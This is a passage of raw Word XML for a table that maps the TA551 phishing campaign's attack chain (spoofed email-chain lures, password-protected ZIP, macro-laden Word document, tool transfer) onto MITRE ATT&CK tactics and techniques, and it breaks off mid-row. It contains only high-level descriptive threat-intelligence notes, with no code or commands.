        <w:gridCol w:w="440"/>
        <w:gridCol w:w="1893"/>
        <w:gridCol w:w="2855"/>
        <w:gridCol w:w="661"/>
        <w:gridCol w:w="699"/>
        <w:gridCol w:w="557"/>
        <w:gridCol w:w="1134"/>
        <w:gridCol w:w="1984"/>
      </w:tblGrid>
      <w:tr w:rsidR="007074DF" w:rsidRPr="002D1D50" w14:paraId="79724DEF" w14:textId="77777777" w:rsidTr="00C21C3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1F55C1B9" w14:textId="77777777" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="37F58676" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="002D1D50" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2855" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="613435CE" w14:textId="1F70D800" w:rsidR="007074DF" w:rsidRPr="002D1D50" w:rsidRDefault="001749E8" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TA551</w:t>
            </w:r>
            <w:r w:rsidR="007074DF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2B0110FB" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="002D1D50" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="62F52B4C" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="002D1D50" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="728AF2B3" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="002D1D50" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="578DB30A" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="002D1D50" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="721A63C4" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="002D1D50" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007074DF" w:rsidRPr="002D1D50" w14:paraId="46BB7A5D" w14:textId="77777777" w:rsidTr="00C21C3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3124D438" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="002D1D50" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CEE2EB3" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="002D1D50" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2855" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08827860" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="002D1D50" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1050AB5B" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="002D1D50" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01CA898B" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="002D1D50" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="520B57E9" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="002D1D50" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18386B41" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="002D1D50" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47774C6B" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="002D1D50" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007074DF" w:rsidRPr="002D1D50" w14:paraId="720DC77C" w14:textId="77777777" w:rsidTr="00C21C3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2152254B" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="002D1D50" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="676D6A1D" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="002D1D50" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2855" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B8CB964" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="002D1D50" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10B12FE3" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="002D1D50" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7886C2FF" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="002D1D50" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64F39EEE" w14:textId="77777777" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7124F8AF" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="002D1D50" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC</w:t>
            </w:r>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="326544D1" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="002D1D50" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007074DF" w:rsidRPr="00B857D7" w14:paraId="641D8731" w14:textId="77777777" w:rsidTr="00C21C3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15AADDC8" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="00B857D7" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="570AED57" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="00B857D7" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">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855" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="593FF879" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="00B857D7" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">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61" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="062C19F2" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="00B857D7" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64EC002D" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="00B857D7" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CCF9F14" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="00B857D7" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5416AF36" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="00B857D7" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEL/IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="054C8882" w14:textId="668F830F" w:rsidR="007074DF" w:rsidRPr="00AB2DC0" w:rsidRDefault="007074DF" w:rsidP="00AB2DC0">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00AB2DC0">
              <w:t>The initial lure is an email spoofing an email chain. These email chains are retrieved from email clients on previously infected hosts. The message has an attached ZIP archive and a message informing the user of a password necessary to open the attachment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007074DF" w:rsidRPr="00B857D7" w14:paraId="3B59C45C" w14:textId="77777777" w:rsidTr="00C21C3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BD843D5" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="00B857D7" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12AF24D6" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="00B857D7" w:rsidRDefault="007074DF" w:rsidP="00AE6A0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855" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6424F324" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="00B857D7" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">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61" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78909E44" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="00B857D7" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F149003" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="00B857D7" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32E59FED" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="00B857D7" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E3522F6" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="00B857D7" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="478B055E" w14:textId="4F84FAC3" w:rsidR="007074DF" w:rsidRPr="00C67790" w:rsidRDefault="00AB2DC0" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[1] After opening the ZIP archive, the victim finds a Microsoft Word document with macros. </w:t>
            </w:r>
            <w:r w:rsidR="00630876">
              <w:t>If the victim enables macros ….</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630876" w:rsidRPr="00B857D7" w14:paraId="42F8F522" w14:textId="77777777" w:rsidTr="00C21C3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="030E65AB" w14:textId="3654E114" w:rsidR="00630876" w:rsidRDefault="00630876" w:rsidP="00630876">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A5F1288" w14:textId="65DBD53D" w:rsidR="00630876" w:rsidRPr="00630876" w:rsidRDefault="00630876" w:rsidP="00630876">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00630876">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00630876">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00630876">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2855" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C56DB35" w14:textId="3D906EBC" w:rsidR="00630876" w:rsidRPr="00630876" w:rsidRDefault="00630876" w:rsidP="00630876">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00630876">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1105 Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B2424AA" w14:textId="3D9D98A9" w:rsidR="00630876" w:rsidRPr="00630876" w:rsidRDefault="00630876" w:rsidP="00630876">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
